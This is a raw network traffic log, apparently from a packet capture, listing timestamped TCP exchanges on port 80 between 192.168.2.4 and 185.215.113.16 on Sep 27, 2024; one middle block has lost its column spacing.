Sep 27, 2024 17:42:03.636382103 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636382103 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636394978 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636411905 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636450052 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636471987 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636471987 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636497974 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636533976 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.636578083 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636578083 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.636605024 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.724539995 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.724553108 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.724647999 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.724647999 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.766791105 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.766855001 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.766886950 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.766902924 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.766938925 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.766940117 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.766978979 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767019033 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767065048 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767323017 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767353058 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767371893 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767399073 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767416000 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767451048 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767462015 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767482996 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767497063 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767517090 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.767528057 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.767571926 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.768090963 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768122911 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768141031 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.768172979 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.768177032 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768223047 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.768234015 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768270969 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768280029 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.768313885 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.768929005 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768961906 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.768996954 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.769036055 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.769036055 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.769046068 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.769068956 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.769079924 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.769093037 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.769124031 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.769779921 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.769813061 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.769821882 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.769855976 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.853353977 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.853425026 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.853543043 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.853585005 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891067982 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891102076 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891134977 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891168118 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891170025 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891196012 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891237020 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891238928 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891282082 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891288042 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891319990 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891328096 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891352892 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891360998 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891397953 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891902924 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891952991 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.891952991 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.891984940 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892000914 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892016888 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892030001 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892050028 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892061949 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892093897 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892385006 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892431974 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892436981 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892469883 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892481089 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892517090 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892518997 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892550945 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892564058 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892584085 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.892594099 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.892632961 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.893337011 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.893388033 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.893388033 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.893431902 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.893438101 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.893471003 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.893482924 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.893501997 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.893516064 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.893536091 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.893543005 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.893578053 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.894218922 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.894268990 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.894272089 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.894301891 CEST  80           49737      185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:03.894313097 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.894341946 CEST  49737        80         192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:03.894351006 CEST  80           49737      185.215.113.16  192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894382954 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894399881 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894416094 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894427061 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894462109 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.895134926 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.895168066 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.895175934 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.895200968 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.895211935 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.895250082 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.895251036 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.895282030 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.895292997 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.895314932 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.895328999 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.895358086 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.896076918 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896131039 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896181107 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896214962 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896238089 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.896246910 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896255016 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.896279097 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896289110 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.896321058 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.896920919 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.896970987 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.897031069 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.897070885 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.941777945 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.941832066 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.941840887 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.941879988 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015655041 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015681982 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015705109 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015714884 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015727997 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015731096 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015738964 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015747070 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015762091 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015769958 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015774012 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015784025 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015794992 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015811920 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015916109 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015928030 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015935898 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015935898 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015935898 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015935898 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015938997 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015949965 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.015958071 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.015990019 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016163111 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016175032 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016185045 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016196012 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016216993 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016233921 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016283989 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016324997 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016326904 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016335964 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016362906 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016376972 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016400099 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016411066 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016422033 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016433954 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016444921 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016473055 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016494989 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016532898 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016607046 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016647100 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016654015 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016664982 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016689062 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016710043 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016766071 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016777992 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016788960 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016801119 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016802073 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016822100 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016846895 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016864061 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.016897917 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.016972065 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017015934 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017036915 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017047882 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017077923 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017090082 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017204046 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017215014 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017225981 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017252922 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017276049 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017287016 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017297029 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017307997 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017323971 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017343998 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017395973 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017406940 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017417908 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017430067 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017436981 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017457962 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017484903 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:04.017601967 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017612934 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017628908 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017640114 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:04.017648935 CEST4973780192.168.2.4185.215.113.16
Sep 27, 2024 17:42:04.017652035 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.017662048 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.017673969 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.017674923 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.017684937 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.017688990 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.017697096 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.017723083 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.017744064 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.017757893 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.017796040 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020669937 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020687103 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020705938 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020715952 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020736933 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020756006 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020761013 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020771980 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020781040 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020798922 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020833015 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020853043 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020900011 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020934105 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020946026 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020956039 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020967960 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020977974 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.020979881 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.020993948 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.021002054 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.021033049 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.021051884 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.021061897 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.021095991 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.021122932 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.021342993 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.021353960 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.021369934 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.021393061 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.021424055 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.030112982 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.030134916 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.030143976 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.030221939 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.030350924 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.030410051 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.030453920 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.030497074 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104406118 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104453087 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104506969 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104541063 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104542017 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104568005 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104574919 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104607105 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104609966 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104635954 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104645967 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104662895 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104681015 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104691029 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104713917 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104724884 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104763985 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104768991 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104801893 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104825974 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104835033 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104851961 CEST  49737  80     192.168.2.4     185.215.113.16
Sep 27, 2024 17:42:04.104867935 CEST  80     49737  185.215.113.16  192.168.2.4
Sep 27, 2024 17:42:04.104887009 CEST  49737  80     192.168.2.4     185.215.113.16
